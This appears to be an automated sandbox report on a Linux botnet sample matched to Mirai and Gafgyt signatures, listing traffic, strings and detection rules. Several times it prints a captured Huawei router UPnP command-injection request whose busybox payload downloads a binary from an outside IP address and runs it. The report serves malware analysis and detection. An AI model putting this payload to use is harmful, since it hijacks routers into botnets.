                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficTCP traffic: 192.168.2.14:46540 -> 185.125.190.26:443
                  Source: unknownTCP traffic detected without corresponding DNS query: 157.233.213.23
                  Source: unknownTCP traffic detected without corresponding DNS query: 157.8.45.235
                  Source: unknownTCP traffic detected without corresponding DNS query: 197.190.231.229
                  Source: unknownTCP traffic detected without corresponding DNS query: 197.174.73.168
                  Source: unknownTCP traffic detected without corresponding DNS query: 197.134.93.225
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.71.63.179
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.204.232.11
                  Source: unknownTCP traffic detected without corresponding DNS query: 157.5.249.164
                  Source: unknownTCP traffic detected without corresponding DNS query: 157.52.181.205
                  Source: unknownTCP traffic detected without corresponding DNS query: 125.39.64.172
                  Source: unknownTCP traffic detected without corresponding DNS query: 157.26.3.225
                  Source: unknownTCP traffic detected without corresponding DNS query: 197.48.229.175
                  Source: unknownTCP traffic detected without corresponding DNS query: 171.128.195.137
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.236.232.103
                  Source: unknownTCP traffic detected without corresponding DNS query: 157.19.87.80
                  Source: unknownTCP traffic detected without corresponding DNS query: 95.51.118.14
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.80.154.10
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.70.199.121
                  Source: unknownTCP traffic detected without corresponding DNS query: 219.72.118.94
                  Source: unknownTCP traffic detected without corresponding DNS query: 197.242.248.238
                  Source: unknownTCP traffic detected without corresponding DNS query: 197.178.199.181
                  Source: unknownTCP traffic detected without corresponding DNS query: 157.212.168.33
                  Source: unknownTCP traffic detected without corresponding DNS query: 197.5.82.148
                  Source: unknownTCP traffic detected without corresponding DNS query: 197.29.9.130
                  Source: unknownTCP traffic detected without corresponding DNS query: 197.225.238.55
                  Source: unknownTCP traffic detected without corresponding DNS query: 14.126.26.250
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.68.57.166
                  Source: unknownTCP traffic detected without corresponding DNS query: 221.191.119.202
                  Source: unknownTCP traffic detected without corresponding DNS query: 157.23.38.169
                  Source: unknownTCP traffic detected without corresponding DNS query: 197.211.212.8
                  Source: unknownTCP traffic detected without corresponding DNS query: 197.83.244.91
                  Source: unknownTCP traffic detected without corresponding DNS query: 221.104.140.125
                  Source: unknownTCP traffic detected without corresponding DNS query: 197.77.24.89
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.225.21.207
                  Source: unknownTCP traffic detected without corresponding DNS query: 41.30.137.212
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.221.220.195
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.2.237.22
                  Source: unknownTCP traffic detected without corresponding DNS query: 157.185.35.87
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.121.75.210
                  Source: unknownTCP traffic detected without corresponding DNS query: 197.52.39.17
                  Source: unknownTCP traffic detected without corresponding DNS query: 125.79.62.244
                  Source: unknownTCP traffic detected without corresponding DNS query: 157.212.90.236
                  Source: unknownTCP traffic detected without corresponding DNS query: 158.13.46.18
                  Source: unknownTCP traffic detected without corresponding DNS query: 77.76.169.184
                  Source: unknownTCP traffic detected without corresponding DNS query: 164.106.102.194
                  Source: unknownTCP traffic detected without corresponding DNS query: 157.227.252.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 157.209.178.18
                  Source: unknownTCP traffic detected without corresponding DNS query: 197.174.164.182
                  Source: unknownTCP traffic detected without corresponding DNS query: 197.215.53.253
                  Source: unknownTCP traffic detected without corresponding DNS query: 197.60.100.141
                  Source: global trafficDNS traffic detected: DNS query: botvectors.mineheaven.org
                  Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
                  Source: unknownHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: bolonetwork.x86.elfString found in binary or memory: http://51.79.141.54/bolonetwork.arm7$
                  Source: bolonetwork.x86.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: bolonetwork.x86.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                  Source: unknownNetwork traffic detected: HTTP traffic on port 46540 -> 443

                  System Summary

                  barindex
                  Source: bolonetwork.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                  Source: bolonetwork.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
                  Source: bolonetwork.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
                  Source: bolonetwork.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
                  Source: bolonetwork.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
                  Source: bolonetwork.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
                  Source: bolonetwork.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
                  Source: bolonetwork.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
                  Source: bolonetwork.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
                  Source: 5518.1.0000000008048000.000000000805e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                  Source: 5518.1.0000000008048000.000000000805e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
                  Source: 5518.1.0000000008048000.000000000805e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
                  Source: 5518.1.0000000008048000.000000000805e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
                  Source: 5518.1.0000000008048000.000000000805e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
                  Source: 5518.1.0000000008048000.000000000805e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
                  Source: 5518.1.0000000008048000.000000000805e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
                  Source: 5518.1.0000000008048000.000000000805e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
                  Source: 5518.1.0000000008048000.000000000805e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
                  Source: 5522.1.0000000008048000.000000000805e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                  Source: 5522.1.0000000008048000.000000000805e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
                  Source: 5522.1.0000000008048000.000000000805e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d Author: unknown
                  Source: 5522.1.0000000008048000.000000000805e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 Author: unknown
                  Source: 5522.1.0000000008048000.000000000805e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f Author: unknown
                  Source: 5522.1.0000000008048000.000000000805e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ae9d0fa6 Author: unknown
                  Source: 5522.1.0000000008048000.000000000805e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 Author: unknown
                  Source: 5522.1.0000000008048000.000000000805e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b Author: unknown
                  Source: 5522.1.0000000008048000.000000000805e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 Author: unknown
                  Source: Process Memory Space: bolonetwork.x86.elf PID: 5518, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                  Source: Process Memory Space: bolonetwork.x86.elf PID: 5518, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
                  Source: Process Memory Space: bolonetwork.x86.elf PID: 5522, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c Author: unknown
                  Source: Process Memory Space: bolonetwork.x86.elf PID: 5522, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
                  Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: Initial sampleString containing 'busybox' found: /bin/busybox
                  Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKtop1hbt.armtop1hbt.arm5top1hbt.arm6top1hbt.arm7top1hbt.mipstop1hbt.mpsltop1hbt.x86_64top1hbt.sh4<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                  Source: Initial sampleString containing 'busybox' found: Content-Length: abcdefghijklmnopqrstuvwxyz/proc/%d/exe/tmp/%s%s%c/proc/self/cmdline/proc/%d/proc/self/proc/proc/%d/cmdlinenetstatwgetcurl/bin/busybox/proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/usr/lib/systemd/systemdshellmnt/sys/boot/media/srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearencodersystem/root/dvr_gui//root/dvr_app//anko-app//opt/anko-app/ankosample _8182T_1104/usr/libexec/openssh/sftp-serverabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ3f
                  Source: ELF static info symbol of initial sample.symtab present: no
                  Source: bolonetwork.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                  Source: bolonetwork.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
                  Source: bolonetwork.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
                  Source: bolonetwork.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
                  Source: bolonetwork.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
                  Source: bolonetwork.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
                  Source: bolonetwork.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
                  Source: bolonetwork.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
                  Source: bolonetwork.x86.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
                  Source: 5518.1.0000000008048000.000000000805e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
                  Source: 5518.1.0000000008048000.000000000805e000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
